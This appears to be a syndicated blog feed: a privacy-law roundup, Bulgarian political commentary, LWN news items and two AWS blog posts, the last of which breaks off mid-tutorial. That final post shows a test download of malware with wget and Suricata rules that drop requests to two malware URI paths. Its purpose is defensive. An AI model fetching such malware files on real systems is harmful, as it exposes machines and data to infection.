As the old saying goes, the only constant is change. And as in 2021, 2022 will undoubtedly be a year of continued regulatory changes as we see new laws enacted, amended, or coming into effect that directly or indirectly regulate the collection, use, and transborder flow of personal data.

In the United States for example, 2022 will require companies to prepare for the California Privacy Rights Act (CPRA), which goes into effect January 1, 2023. Importantly, CPRA will have “retrospective requirements”, meaning companies will need to look back and apply rules to personal data collected as of January 1, 2022. Likewise, Virginia’s and Colorado’s privacy laws are coming into force in 2023. And a number of other States, including but not limited to Florida, Washington, Indiana, and the District of Columbia, have proposed their own privacy laws. For the most part, these bills are aimed at giving consumers greater control over their personal data — such as establishing consumers’ rights to access and delete their data — and placing obligations on companies to ensure those rights are protected and respected.

Meanwhile, elsewhere in the world, we are seeing a shift in data privacy legislation. No longer are data protection laws focusing only on personal data; they are expanding to regulate the flow of all types of data. The clearest example of this is in India, where a parliamentary committee in December 2021 included recommendations that the “Personal Data Protection Bill” be renamed the “Data Protection Bill” and that its scope be expanded to include non-personal data. The bill would place obligations on organizations to extend to non-personal data the same protections that existing data protection laws extend to personal data. The implications of the proposed updates to India’s Data Protection Bill are significant. They could dramatically impact the way in which organizations use non-personal data for analytics and operational improvements.

India is not the only country to propose expanding the scope of data regulation to include non-personal data. The European Union’s Data Strategy aims to provide a secure framework enhancing data sharing with the stated goal that such sharing will drive innovation and expedite the digitalization of the European economy.

Other data privacy legislation to keep an eye on in 2022 will be Japan’s amendment to its Act on Protection of Personal Information (APPI) and Thailand’s Personal Data Protection Act (PDPA), which will come into force in 2022. Proposed amendments to Japan’s APPI include requirements to be met in order to transfer Japanese personal data outside of Japan and the introduction of data breach notification requirements. Meanwhile, like the GDPR, Thailand’s PDPA aims to protect individuals’ personal data by imposing obligations on organizations that collect, process, and transfer such personal data.

With all these privacy enhancing technologies and regulatory changes on the horizon, we expect 2022 to be another exciting year in the world of data protection and data privacy. Happy Data Privacy Day!

Кандидатурата ми за НС на Да, България

Post Syndicated from original https://yurukov.net/blog/2022/ns-dabulgaria/

Тази събота ще се проведе националната конференция на Да, България . След три поредни вота се натрупа страшна умора, но и доста въпроси и пътища напред, които трябва да намерят своето решение.

Имаше, разбира се, много нападки, конспирации и интриги завъртяни около партията. Някой бяха очаквани, други следваше да прозрем по-рано. Лесно се затъва в блатото на кой какво кога бил казал и достатъчно сме го правили в последната година. Ако съм имал някакви съмнения в начина на процедиране, в ръководенето на партията или в работата на националния съвет, щях веднага да изляза и да спра да се занимавам. Казах го още в деня на учредяването на партията.

Всяко решение в Да, България се взима след обстойно обсъждане и гласуване на националният съвет и затова е важно какви хора има в него. Не съм бил съгласен с някои решения, но съм разбирал защо другите гласуват така. Това е същността на демократичния процес. Ако някой не е съгласен с една или друга политика, сътрудничество или компромис, като член на партията в събота е мястото са определи с какви хора и решения иска са се продължи напред.

Затова, ако сте членове на Да, България, ще съм благодарен, ако ме подкрепите като кандидат за НС. Уверен съм, че има с какво да помогна и допринеса. Позициите си съм описвал подробно в социалните мрежи и в блога ми през годините. Решенията по тях, както и самата политика, са процес, който трябва да бъде извървян. За целта трябва да седнем на масата, където се взимат решенията и стъпките, а не да гледаме и подвикваме отстрани.Всички кандидати и аргументи ще намерите на страницата на Да, България.

The post Кандидатурата ми за НС на Да, България first appeared on Блогът на Юруков.

Не дрънчи на война, а на копейки

Post Syndicated from Емилия Милчева original https://toest.bg/ne-drunchi-na-voyna-a-na-kopeyki/

Министър-председателят Кирил Петков е прав, когато казва, че „явно напрежението се вдига, но не дрънчи на война“. В България много по-силно дрънчи онова, което така и не бе дефинирано като заплаха от институции и управляващи – руската хибридна война, която е в апогея си от 2014-та, годината на анексията на Крим и сепаратистките републики в Източна Украйна, както и на санкциите срещу Русия.

Антинатовската и анти-САЩ пропаганда, която оттогава все по-отчетливо кънти от различни български медии и „говорещи глави“, бе улеснена от липсата на категорична позиция на българските правителства – независимо дали начело е Пламен Орешарски, или Бойко Борисов – относно действията на Русия в Украйна. Вече се чува и от трибуната на Народното събрание, с цялата си гарнитура в типичен максимално опростенчески стил – безпомощната Европа и изобщо проваленият Запад; „чуждите войски“ от НАТО, чиято марионетка е България, и изобщо войнолюбците от Алианса, от които „идва напрежението с Русия“. И лидерът на представената вече в парламента партия „Възраждане“ Костадин Костадинов иска референдум за излизане от НАТО, чийто член България избра да е преди 18 години. За същото настояваше преди време и Николай Малинов от Национално движение „Русофили“.

Геополитическото напрежение днес обаче изисква от София да спре с въртеливите движения във външната си политика в стила на един вече бивш премиер. Бойко Борисов се гордееше с уменията си да обслужва и едната, и другата велика сила и дори твърдеше, че може да го прави едновременно. (Но май повече го теглеше към Русия…)

В сряда 47-мият парламент изслуша премиера, министрите на отбраната и на външните работи – Стефан Янев и Теодора Генчовска, и на закрити врата – директорите на спецслужбите, заради напрежението по оста Русия–Украйна–НАТО. В крайна сметка заявеното от премиера е, че правителството е решило да акцентира в българската позиция „в посока деескалация на напрежението между НАТО и Руската федерация“. Какви изводи може да се направят?

Първо, позицията на България много закъсня.

За повишаване на напрежението между Москва и Киев се говори от поне четири месеца, тоест от времето, когато Янев беше служебен премиер. Но нито той, нито президентът Румен Радев, който го назначи, поставиха тази тема в дневния ред и тя отсъстваше и от заседанията на Консултативния съвет по национална сигурност към президента, и от тези на Съвета по сигурността към Министерския съвет. Като служебен премиер Янев свика Съвета заради корупцията, мигрантската вълна от Афганистан, но не и заради непосредствената заплаха за националната сигурност, каквато би бил един конфликт в Черно море и Украйна.

Още от 2014 г. България е силно обезпокоена от напрежението по източния фланг, каза вчера в парламента външната министърка. Ако е имало такова безпокойство, било е твърде дискретно проявено. Българската позиция, заявена след КСНС при президента Росен Плевнелиев през март 2014 г. и приета от всички политически сили с изключение на „Атака“, бе, че референдумът в Крим е незаконен (чиито резултати станаха формален аргумент за Москва да анексира украинския полуостров). Позиция на парламента обаче нямаше. По-късно и тогавашният премиер Орешарски, и следващият – Борисов, се обявиха за отпадане на санкциите срещу Русия. Както впрочем и президентът Румен Радев, който в кампанията за втория си мандат каза: „Крим в момента е руски, какъв да е!“

Второ, проличаха отново разногласия в правителството по темата за Русия.

Те станаха видими още с онази позиция на Стефан Янев във Facebook, в която той се обяви срещу дислоцирането на войски на НАТО в България. Тя предизвика международен отзвук, а Руското посолство в България я сподели във Facebook акаунта си. Премиерът Петков я коригира – не била официална за правителството, но разнобоят отново се усети. Категоричността на премиера пред депутатите контрастира с уклончивостта на военния министър, който преповтори, макар и с други думи, онова си по-раншно мнение.

Позицията на българското правителство е много ясна и изчистена – да сме конструктивен съюзник в НАТО, отговорен член и партньор на ЕС, с предвидима и ясно декларирана позиция, и никой не трябва да се упражнява по тази тема. 

Кирил Петков

Не се предвижда приемането на сухопътни войски на съюзниците от НАТО у нас, вместо това ще се създаде батальон, който да може да бъде изпращан и в чужбина за учения на НАТО… съответно неговото командване и управление, командната верига в посока обмен на информация с военните органи на НАТО, ще става през национални комуникационни канали.

Стефан Янев

В изявлението си пред парламента Янев пресоли манджата: „Нито един български войник няма да вземе участие в конфликт или операция на територията на Украйна или друга държава, без тези решения да бъдат взети в тази зала – на Народното събрание.“ Ама разбира се, че е така и без министърът на президента да го обещае – повелява го Конституцията, чл. 84, т. 11: „Народното събрание разрешава изпращането и използването на български въоръжени сили извън страната, както и пребиваването на чужди войски на територията на страната или преминаването им през нея.“ С решение на 39-тото НС в Ирак бе изпратен български контингент в състава на Многонационалните сили, пак парламентът одобри участие на България в мисията на Международните стабилизиращи сили в Афганистан…

Но американската телевизия Си Ен Ен информира, че България, Румъния и Унгария обсъждат разполагане на американски военни преди евентуална руска интервенция в Украйна. Става въпрос за контингенти от по 1000 души във всяка от трите държави. А БНР предаде, че България не желае американски натовски войници, но е готова да приеме например френски. Предстои решението да бъде взето. Но ако българските управляващи се боят да кажат на обществото, че НАТО, без значение каква е националността на контингента, гарантира сигурността на България, значи руските проводници са си свършили работата.

Трето, във фокуса попаднаха отбранителните способности на българската армия и инвестициите в сигурност –

не само заради укрепване на слабото звено на югоизточния фланг на НАТО. За тях говори, освен премиерът, и съпредседателят на „Демократична България“ Христо Иванов.

Ние трябва да инвестираме в собствена отбрана. Трябва да инвестираме целенасочено и последователно в сфери като енергетиката, киберсигурността, състоянието на службите и институции, от които зависи националната сигурност. Това включва и борбата с корупцията, която винаги е била огромен портал, през който чужди влияния, основно руски, са влизали в България.

Христо Иванов

Но това също така означава, че министърът на отбраната не може да решава за закупуване на две подводници втора ръка, без управляващата коалиция да е решила и одобрила кои от проектите за модернизация и превъоръжаване на армията са приоритетни. А за подводници преговаряше още военният министър Каракачанов от третото правителство на Борисов.

Четвърто, българското малцинство в Украйна дали е във фокуса на българската външна политика –

в контекста на ескалацията на напрежение? Става въпрос за около 250 000 българи, към които никой не прояви интерес по време на изслушването на премиера и министрите. Правителството съобщи, че има готовност да изпрати самолет в Украйна за българските дипломати и семействата им. В деня след изслушването външната министърка Теодора Генчовска на пресконференция съобщи, че от две седмици са в контакт с Българското посолство в Украйна и към този момент няма проявено желание за евакуация, но „плановете за евакуация са актуализирани“ и при необходимост „партньорите от НАТО ще осигурят логистика“, каза Генчовска.

По БНР тази седмица политологът Огнян Минчев коментира, че се води пропаганда с цел да се убедят българските граждани, че всяко наше пълноценно участие в структурите на НАТО е насочено против българския национален интерес, защото ще ни вкара в конфликт с Русия. Тази пропаганда няма да стихне, напротив. Разполагането на натовски контингент ще бъде употребено, също както и робската енергийна зависимост от Москва, ненарушена от никое правителство досега.

Дрънчи на копейки.

Заглавна снимка: Министърът на отбраната Стефан Янев по време на изслушването в парламента на 25 януари 2022 г. Стопкадър от видеорепортаж на Debati.bg

Източник

Индивидуални и колективни права. Бележки към реплика на Румен Радев

Post Syndicated from Светла Енчева original https://toest.bg/individualni-i-kolektivni-prava/

По време на посещението си в София македонският премиер Димитър Ковачевски намекна, че българите могат да бъдат вписани в Конституцията на Република Северна Македония, без директно да ги споменава. Според Българския културен клуб в Скопие обаче подобна стъпка би дала основания да се признае македонско малцинство у нас. И наистина, ако България изисква българското малцинство да бъде вписано в Конституцията на Република Северна Македония, не е ли редно страната ни да постъпи реципрочно, като впише македонско малцинство в основния си закон?

Президентът Румен Радев не смята така. Още след посещението на премиера Кирил Петков в югозападната ни съседка Радев обоснова отрицателния отговор на този въпрос по следния начин:

Всякакви твърдения, че ако България поиска равноправие на македонските българи, вписано в Конституцията, от своя страна като реципрочност Македония може да поиска македонско малцинство в България, са абсолютно несъстоятелни […] Нека не забравяме, че нашите конституционни уредби са коренно различни. Българската Конституция предвижда закрила на индивидуални права. Докато македонската Конституция се основава на колективни права на части от народи. Така че това няма как изобщо да се случи.

Думите на Радев останаха без коментар, а заслужават по-сериозно вглеждане. Защото се вписват в определено интелектуално-политическо направление, според което автентичните права са единствено индивидуалните, а колективни права всъщност няма – тоест те не са истински права. Затова според президента българската Конституция си е абсолютно в реда на нещата – македонската е тази, която трябва да се промени.

Идеята за универсални човешки права е концепция на класическия либерализъм,

в рамките на която правата са именно индивидуални. Обществото се състои от индивиди, които по природа притежават неотменими права. Тези права не зависят от произхода, традициите или нещо друго. Класикът на либерализма Джон Лок например описва разума като чиста дъска, по която опитът пише. По същия начин обществото е нещо като голо поле, което се структурира от човешките действия.

Философията на либерализма е адекватна на възникващото модерно общество, което се противопоставя на аристокрацията. На другия полюс е класическият консерватизъм, който – разбираемо – недолюбва идеята за човешките права и за върховенството на индивида. От гледна точка на консерватизма обществото се крепи на традиции, култура, ценности. Да се държиш, сякаш то е голо поле и преди теб е нямало нищо, е като да събаряш паметници на културата и да гориш книги.

С течение на времето и либерализмът, и консерватизмът се променят и придобиват множество разновидности.

Доведен до крайност, либерализмът стига до своето отрицание. Универсалните човешки права изхождат от представите на създателите им за човека. И още повече – от хоризонта на онези, които прилагат правата на практика. А от тези представи все някоя група хора липсва – жените, робите, бедните, туземните общности, етническите или расовите малцинства… Ето защо в иначе модерните и либерални общества жените придобиват равно право на глас толкова късно. (Последният швейцарски кантон, който позволява на жените да гласуват, го прави чак през 1990 г., и то след решение на Федералния съд.) А членовете на множество туземни общности са буквално избити, защото не отговарят на „правилната“ представа за човека.

Така с течение на времето се стига до идеята за колективни (групови) права, които да компенсират онези, на които уж универсалните права не са по мярка. По произход концепцията за колективни права не е нито либерална, нито консервативна, а е лява. Именно лявото се бори първо за права на работниците, после за права на жените. В тоталитарните държави и в радикалните си варианти и лявото стига до своята противоположност, обявявайки човешките права за буржоазна измислица. Защото според крайнолявото свободата трябва да се постигне не посредством борба за права, а с революция.

Междувременно концепцията за колективните права се прилага все повече, макар и не повсеместно. Възприета и от Европейския съюз, тя предоставя повече възможности за гарантиране на равните права на представителите на различни уязвими и малцинствени групи.

Как така хем групови, хем равни права?

Нека дадем пример. На теория всеки има правото да посети определена публична институция, тоест това е индивидуално право. Само че в институцията се влиза по стълби, а това е пречка за хората, които се придвижват с инвалидни колички. Поставянето на рампа дава възможност на лицата с увреждания да упражнят предоставеното им право. С други думи, достъпът до индивидуални права не би бил възможен за всички хора, ако не допускаме съществуването на групи със специфични потребности, представителите на които срещат специфични пречки при осъществяването на правата си.

Впрочем – дори при наличието на групови права – те никога не се отнасят до всички, а зависят от изпълнението на определени условия. Дори гарантирането на правото на живот, което е най-основното човешко право, зависи от множество фактори, като гражданство, миграционен статут, икономическо или социално положение, война… Но концепцията за групови права, макар и несъвършена, поне си дава сметка за собственото си несъвършенство и се опитва да се самокоригира. Дава си сметка и за това, че

на практика индивидуалните права са винаги групови – винаги нечии.

В наши дни индивидуалните права са кауза най-вече на либертарианците, които в икономическо отношение са по-близо до консерваторите, отколкото до класическите либерали. Ала постепенно те стават кауза и на самите (нео)консерватори – говоренето за индивидуални права, за да се защити привилегироваността на определена група (обикновено тази на господстващото мнозинство), е печеливша стратегия.

Да вземем например американските консерватори от тръмпистки тип. Изграждането на ограда на границата с Мексико не противоречи на „индивидуалните права“, защото мексиканците не влизат в групата на „ние“. Но когато става дума за предпазването от COVID-19, тогава индивидуалното право на свобода и личен избор се оказва над всичко, най-вече над обществения интерес, понеже обществото се състои от индивиди.

Същото може да се каже и за нашите националисти, особено тези от „Възраждане“, които са много загрижени за правата на българите навсякъде по света и искат да се въведе тотална цензура посредством образованието. Но когато става дума за сертификати и мерки, изведнъж се превръщат в крайни индивидуалисти и адепти на абсолютната свобода. За индивидуалната свобода на родителите как да възпитават децата си, говорят и ВМРО, според които детето не е субект, но семейството притежава права като индивид.

Подобна непоследователност се забелязва и по отношение на словото на омразата.

По дефиниция то се отнася към представителите на определени групи. Според либертарианците и неоконсерваторите концепцията за слово на омразата ограничава абсолютната свобода на изразяване на индивида. Тоест допустимо е да се обиждат дадени хора единствено на базата на принадлежността им към определена група, но ако те искат да се защитят от това – не може, защото принадлежат към определена група.

Парадоксалността на абсолютизирането на индивидуалните права проличава и в множество други отношения. Да вземем еднополовите бракове. Един от основните аргументи срещу тях е, че груповите права са по същество „специални права“. А истината е тъкмо обратната – бракът между мъж и жена включва групата на мъжете и жените, които се женят помежду си, и изключва останалите, които искат да сключат брак с човек от своя пол. Но точно аргументът за „специалните права“ е водещ при отказа на гарантирането на равни права на представителите на дискриминирани групи.

„Никой човек не е остров изцяло за себе си […] И затова никога не пращай да узнаят за кого бие камбаната; тя бие за теб“,

пише през ХVII век английският поет и проповедник Джон Дън (прев. Александър Шурбанов), няколко години преди раждането на Джон Лок. Произведенията на Дън може да се причислят към традицията на консерватизма, заплашен от либерализма с неговите индивиди острови. Три века по-късно най-известното му стихотворение вече позволява интерпретация от леви позиции и така дава заглавието на романа на Ърнест Хемингуей „За кого бие камбаната“. А четири века след Дън (пишман) консерваторите са се хванали за индивида и неговите права като удавник за сламка. А с тях – и българският президент Румен Радев.

Репликата на Радев за разликата между българската и македонската Конституция разкрива цялото лицемерие на съвременния вариант на концепцията за индивидуалните права като единствено валидните. Защото в България, където ние сме мнозинство, правата са индивидуални, но в същото време искаме да се възползваме от колективните права в други страни, където сме малцинство. Като са будали македонците да си включат малцинствата в основния закон, значи трябва да включат и нас.

Наивно би било да очакваме, че след като Румен Радев е издигнат за президент от БСП, значи е ляв – самата БСП отдавна е лява само на думи. Президентът се държи като класически популист, изговаряйки представите на онези „патриоти“, които искат правата на българите като етническа общност да бъдат гарантирани навсякъде по света. Без да предлагат нищо в замяна на онези, които живеят в България, но не са етнически българи.

Популизмът от аргументи не разбира. Радикалните и едностранчивите идеологии – също. И все пак между популизма и крайностите има достатъчно пространство да се замислим как дефинираме човешките права. И какво следва от една или друга дефиниция.

Заглавна снимка: Km Wilhelm / Wikimedia

Източник

Rosenzweig: Writing an open source GPU driver – without the hardware

Post Syndicated from original https://lwn.net/Articles/882974/rss

Here’s a
war story from Alyssa Rosenzweig
on the process of writing a free
driver for Arm’s “Valhall” GPUs without having the hardware to test it on.

In 2021, there were no Valhall devices running mainline
Linux. While a lack of devices poses an obvious obstacle to device
driver development, there is no better time to write drivers than
before hardware reaches end-users. Developing and distributing
production-quality drivers takes time, and we don’t want users to
be reliant on closed source blobs. If development doesn’t start
until a device hits shelves, that device could reach “end-of-life”
by the time there are mature open drivers. But with a head start,
we can have drivers ready by the time devices reach end users.

LSFMM 2022 call for proposals

Post Syndicated from original https://lwn.net/Articles/882966/rss

The Linux Storage, Filesystem, Memory-Management, and BPF Summit is
scheduled for May 2 to 4 in Palm Springs, California; with luck
it will actually happen this year. As usual, it is an invitation-only
event, with a preference for those who bring interesting topics to discuss.
The call for
proposals
is out now, with a request for proposals to arrive before
March 1.

GNU poke 2.0 released

Post Syndicated from original https://lwn.net/Articles/882965/rss

Version 2.0 of GNU Poke, a binary-data editor, has been released. “A
lot of things have changed and improved with respect to the 1.x series; we
have fixed many bugs and added quite a lot of new exciting and useful
features.
” Look below for an extensive list of changes.

Codacy Measures Developer Productivity using AWS Serverless

Post Syndicated from Catarina Gralha original https://aws.amazon.com/blogs/architecture/codacy-measures-developer-productivity-using-aws-serverless/

Codacy is a DevOps insights company based in Lisbon, Portugal. Since its launch in 2012, Codacy has helped software development and engineering teams reduce defects, keep technical debt in check, and ship better code, faster.

Codacy’s latest product, Pulse, is a service that helps understand and improve the performance of software engineering teams. This includes measuring metrics such as deployment frequency, lead time for changes, or mean time to recover. Codacy’s main platform is built on top of AWS products like Amazon Elastic Kubernetes Service (EKS), but they have taken Pulse one step further with AWS serverless.

In this post, we will explore the Pulse’s requirements, architecture, and the services it is built on, including AWS Lambda, Amazon API Gateway, and Amazon DynamoDB.

Pulse prototype requirements

Codacy had three clear requirements for their initial Pulse prototype.

  1. The solution must enable the development team to iterate quickly and have minimal time-to-market (TTM) to validate the idea.
  2. The solution must be easily scalable and match the demands of both startups and large enterprises alike. This was of special importance, as Codacy wanted to onboard Pulse with some of their existing customers. At the time, these customers already had massive amounts of information.
  3. The solution must be cost-effective, particularly during the early stages of the product development.

Enter AWS serverless

Codacy could have built Pulse on top of Amazon EC2 instances. However, this brings the undifferentiated heavy lifting of having to provision, secure, and maintain the instances themselves.

AWS serverless technologies are fully managed services that abstract the complexity of infrastructure maintenance away from developers and operators, so they can focus on building products.

Serverless applications also scale elastically and automatically behind the scenes, so customers don’t need to worry about capacity provisioning. Furthermore, these services are highly available by design and span multiple Availability Zones (AZs) within the Region in which they are deployed. This gives customers higher confidence that their systems will continue running even if one Availability Zone is impaired.

AWS serverless technologies are cost-effective too, as they are billed per unit of value, as opposed to billing per provisioned capacity. For example, billing is calculated by the amount of time a function takes to complete or the number of messages published to a queue, rather than how long an EC2 instance runs. Customers only pay when they are getting value out of the services, for example when serving an actual customer request.

Overview of Pulse’s solution architecture

An event is generated when a developer performs a specific action as part of their day-to-day tasks, such as committing code or merging a pull request. These events are the foundational data that Pulse uses to generate insights and are thus processed by multiple Pulse components called modules.

Let’s take a detailed look at a few of them.

Ingestion module

Figure 1. Pulse ingestion module architecture

Figure 1. Pulse ingestion module architecture

Figure 1 shows the ingestion module, which is the entry point of events into the Pulse platform and is built on AWS serverless applications as follows:

  • The ingestion API is exposed to customers using Amazon API Gateway. This defines REST, HTTP, and WebSocket APIs with sophisticated functionality such as request validation, rate limiting, and more.
  • The actual business logic of the API is implemented as AWS Lambda functions. Lambda can run custom code in a fully managed way. You only pay for the time that the function takes to run, in 1-millisecond increments. Lambda natively supports multiple languages, but customers can also bring their own runtimes or container images as needed.
  • API requests are authorized with keys, which are stored in Amazon DynamoDB, a key-value NoSQL database that delivers single-digit millisecond latency at any scale. API Gateway invokes a Lambda function that validates the key against those stored in DynamoDB (this is called a Lambda authorizer.)
  • While API Gateway provides a default domain name for each API, Codacy customizes it with Amazon Route 53, a service that registers domain names and configures DNS records. Route 53 offers a service level agreement (SLA) of 100% availability.
  • Events are stored in raw format in Pulse’s data lake, which is built on top of AWS’ object storage service, Amazon Simple Storage Service (S3). With Amazon S3, you can store massive amounts of information at low cost using simple HTTP requests. The data is highly available and durable.
  • Whenever a new event is ingested by the API, a message is published in Pulse’s message bus. (More information later in this post.)

Events module

Figure 2. Pulse events module architecture

Figure 2. Pulse events module architecture

The events module handles the aggregation and storage of events for actual consumption by customers, see Figure 2:

  • Events are consumed from the message bus and processed with a Lambda function, which stores them in Amazon Redshift.
  • Amazon Redshift is AWS’ managed data warehouse, and enables Pulse’s users to get insights and metrics by running analytical (OLAP) queries with the highest performance.
  • These metrics are exposed to customers via another API (the public API), which is also built on API Gateway.
  • The business logic for this API is implemented using Lambda functions, like the Ingestion module.

Message bus

Figure 3. Message bus architecture

Figure 3. Message bus architecture

We mentioned earlier that Pulse’s modules communicate messages with each other via the “message bus.” When something occurs at a specific component, a message (event) is published to the bus. At the same time, developers create subscriptions for each module that should receive these messages. This is known as the publisher/subscriber pattern (pub/sub for short), and is a fundamental piece of event-driven architectures.

With the message bus, you can decouple all modules from each other. In this way, a publisher does not need to worry about how many or who their subscribers are, or what to do if a new one arrives. This is all handled by the message bus.

Pulse’s message bus is built like this, shown in Figure 3:

  • Events are published via Amazon Simple Notification Service (SNS), using a construct called a topic. Topics are the basic unit of message publication and consumption. Components are subscribed to this topic, and you can filter out unwanted messages.
  • Developers configure Amazon SNS subscriptions to have the events sent to a queue, which provides a buffering layer from which workers can process messages. At the same time, queues also ensure that messages are not lost if there is an error. In Pulse’s case, these queues are implemented with Amazon Simple Queue Service (SQS).

Other modules

There are other parts of Pulse architecture that also use AWS serverless. For example, user authentication and sign-up are handled by Amazon Cognito, and Pulse’s frontend application is hosted on Amazon S3. This app is served to customers worldwide with low latency using Amazon CloudFront, a content delivery network.

Summary and next steps

By using AWS serverless, Codacy has been able to reduce the time required to bring Pulse to market by staying focused on developing business logic, rather than managing servers. Furthermore, Codacy is confident they can handle Pulse’s growth, as this serverless architecture will scale automatically according to demand.

How to deploy AWS Network Firewall to help protect your network from malware

Post Syndicated from Ajit Puthiyavettle original https://aws.amazon.com/blogs/security/how-to-deploy-aws-network-firewall-to-help-protect-your-network-from-malware/

Protecting your network and computers from security events requires multi-level strategies, and you can use network level traffic filtration as one level of defense. Users need access to the internet for business reasons, but they can inadvertently download malware, which can impact network and data security. This post describes how to use custom Suricata Rules with AWS Network Firewall to add protections that prevent users from downloading malware. You can use your own internal list, or a list from commercial or open-source threat intelligence feeds.

Network Firewall is a managed service that makes it easy to deploy essential network protection for all of your Amazon Virtual Private Cloud (Amazon VPC) Infrastructure. Network Firewall’s flexible rules engine lets you define firewall rules, giving you fine-grained control over network traffic, such as blocking outbound requests to prevent the spread of potential malware.

Features of Network Firewall

This section describes features of Network Firewall that help improve the overall security of your network.

Network Firewall:

  • Is a managed Amazon Web Services (AWS) service, so you don’t have to build and maintain the infrastructure to host the network firewall.
  • Integrates with AWS Firewall Manager, which allows you to centrally manage security policies and automatically enforce mandatory security policies across existing and newly created accounts and virtual private clouds (VPCs).
  • Protects application availability by filtering inbound internet traffic using tools such as access control list (ACL) rules, stateful inspection, protocol detection, and intrusion prevention.
  • Provides URL, IP address, and domain-based outbound traffic filtering to help you meet compliance requirements, stop potential data leaks, and block communication with known malware hosts.
  • Gives you control and visibility of VPC-to-VPC traffic to logically separate networks that host sensitive applications or line-of-business resources.
  • Complements existing network and application security services on AWS by providing control and visibility to layer 3 through 7 network traffic for your entire VPC.

Automating deployment of Network Firewall and management of Network Firewall rules support management at-scale and help in timely response, as Network Firewall is designed to block access to insecure sites before they impact your resources. For the solution in this blog post, you’ll use an AWS CloudFormation template to deploy the network architecture with Network Firewall.

Solution architecture

Figure 1 shows a sample architecture to demonstrate how users are able to download malware files, and how you can prevent this using network firewall rules.

Network Firewall is deployed in a single VPC architecture, where it is placed in line with the traffic to and from the internet.

Figure 1. Network architecture diagram

Figure 1. Network architecture diagram

The network architecture shown in Figure 1 includes three subnets:

  1. A network firewall subnet
    Hosts the Network Firewall endpoint interface. All outbound traffic from this network goes through the internet gateway.
  2. A public subnet
    Hosts a NAT gateway. The next hop from the public subnet is the Network Firewall endpoint, where all traffic can be inspected before being forwarded to the internet.
  3. A private network subnet
    Used to host the client instances. All outbound traffic from this network goes to the NAT gateway endpoint.

In the network architecture shown in Figure 1, only one AZ is shown for simplicity, but best practices recommend deploying infrastructure across multiple AZs

To run the CloudFormation deployment template

  1. To set up the architecture shown in Figure 1, launch the provided CloudFormation deployment template using the Launch stack button in step 2 below.
    This CloudFormation template:

    • Sets up VPCs and appropriate subnets as required by the network architecture.
    • Creates a route table with appropriate routes and attaches it to the appropriate subnet (i.e. private subnet, firewall subnet, public subnet).
    • Creates a test instance with appropriate security groups.
    • Deploys Network Firewall with firewall policy.
    • Creates a Rule Group SampleStatefulRulegroupName with Suricata rules, which is not attached to a firewall policy
  2. To launch the stack, click the Launch Stack button below.
  3. Select the Launch Stack button to launch the template

  4. Name the newly created stack (for example, nfw-stack).
  5. The template will also install two sample rules that will be used to protect against accessing two sample malware site URLs, but it will not automatically attach them to a firewall policy
  6. You can see that Network Firewall with firewall policy was deployed as part of the basic CloudFormation deployment. It also created Suricata rules in rule groups, but is not yet attached to the firewall policy.

    Note: Unless you attach the rule to the Network Firewall, it will not provide the required protection.

Example: confirming vulnerability

We have identified two sample URLs that contain malware to use for demonstration.

In the example screen shot below, we tested vulnerability by logging into test instance using AWS Session Manager. and at the shell prompt, used wget to access and download a malware file.

Figure 2 that follows is a screenshot of how a user could access and download two different malware files.

Note: Since these URLs contain malware files, we do not recommend users perform this test, but are providing a screenshot as a demonstration. If you wish to actually test ability to download files, use URLs you know are safe for testing.

Figure 2. Insecure URL access

Figure 2. Insecure URL access

Network Firewall policies

Before the template creates the Network Firewall rule group, it creates a Network Firewall policy and attaches it to the Network Firewall. An AWS Network Firewall firewall policy defines the monitoring and protection behavior for a firewall. The details of the behavior are defined in the rule groups that you add to your policy.

Network Firewall rules

A Network Firewall rule group is a reusable set of criteria for inspecting and handling network traffic. You can add one or more rule groups to a firewall policy as part of policy configuration. The included template does this for you.

Network Firewall rule groups are either stateless or stateful. Stateless rule groups evaluate packets in isolation, while stateful rule groups evaluate them in the context of their traffic flow. Network Firewall uses a Suricata rules engine to process all stateful rules.

Suricata rules can be used to create a Network Firewall stateful rule to prevent insecure URL access. Figure 3 shows the Suricata rules that the template adds and attaches to the Network Firewall policy in order to block access to the sample malware URLs used in the previous example.

Figure 3. Suricata rules in a Network Firewall rule group

Figure 3. Suricata rules in a Network Firewall rule group

Attach the rule group to the Network Firewall policy

When you launched the CloudFormation template, it automatically created these rules in the rule group. You will now be attaching this rule group to the firewall policy in order to enable the protection. You will need similar rules to block the test URLs that are used for your testing.

Figure 3 shows two Suricata rules that have been configured to block the insecure malware URLs.

To add Suricata rules to Network Firewall

To improve site security and protect against downloading malware, you can add Suricata rules to Network Firewall to secure your site. You’ll do this by:

  1. Creating and attaching a firewall policy to the Network Firewall.
  2. Creating rules as part of rule groups, which are attached to the firewall policy
  3. Testing to verify that access to malware URLs from the instance is blocked.

Let’s review Suricata Rules that are created, which can be attached to Network Firewall.

Suricata rule parts

Each Suricata rule has three parts:

  1. Action
  2. drop action that should be taken

  3. Header
  4. http this is the traffic protocol

    $HOME_NET anywhere $HOME_NET is a Suricata variable. By default it is set to the CIDR range of the VPC where Network Firewall is deployed and any refers to any source port

    $EXTERNAL_NET 80 where $EXTERNAL_NET 80 is a Suricata standard variable that refers to traffic destination, and 80 refers to the destination port

    -> is the direction that tells in which direction the signature has to match

  5. Options
  6. msg “MALWARE custom solution” – gives textual information about the signature and the possible alert

    flow to_server,established – it is used to match on the direction of the flow and established refers to match on established connections

    classtype trojan-activity – gives information about the classification of rules and alerts

    sid:xxxxx gives every signature its own id

    content “xxxx” – This keyword is very important and it identifies the pattern that your signature should match.

    http_uri is a content modifier that helps you match specifically and only on the request URI

    rev:xxx this goes along with sid keyword. It represents the version of the signature

The signatures in the Suricate rule shown in Figure 3 will block traffic that matches the http_uri contents /data/js_crypto_miner.html and /data/java_jre17_exec.html when the traffic is initiated from the VPC to the public network.

To attach a rule group to an existing Network Firewall

In Figure 4, the Network Firewall has a policy attached. but it does not have a rule group

Figure 4. A policy is attached, but not a rule group

Figure 4. A policy is attached, but not a rule group

  1. As shown in Figure 5, choose Add rule group to start adding your Suricata rule to the Network Firewall.
  2. Choose Add from existing stateful rule groups to attach an already created Suricata rule group.
  3. Figure 5. Choose Add rule group

    Figure 5. Choose Add rule group

  4. Figure 6 shows the Suriacata rule groups that are already created. SampleStatefulRulegroupName is the rule group created by the CloudFormation template.
  5. Select the rule group and choose Add stateful rule group to finish adding the rule group to Network Firewall.
  6. Figure 6. Review the rule groups that are already created

    Figure 6. Review the rule groups that are already created

  7. Figure 7 shows that the rule group SampleStatefulRulegroupName is now part of the Stateful rule group section of Network Firewall screen, which completes adding Suricata rules to Network Firewall.
  8. Figure 7. Shows the new rule group is now added

    Figure 7. Shows the new rule group is now added

Example: validating the solution

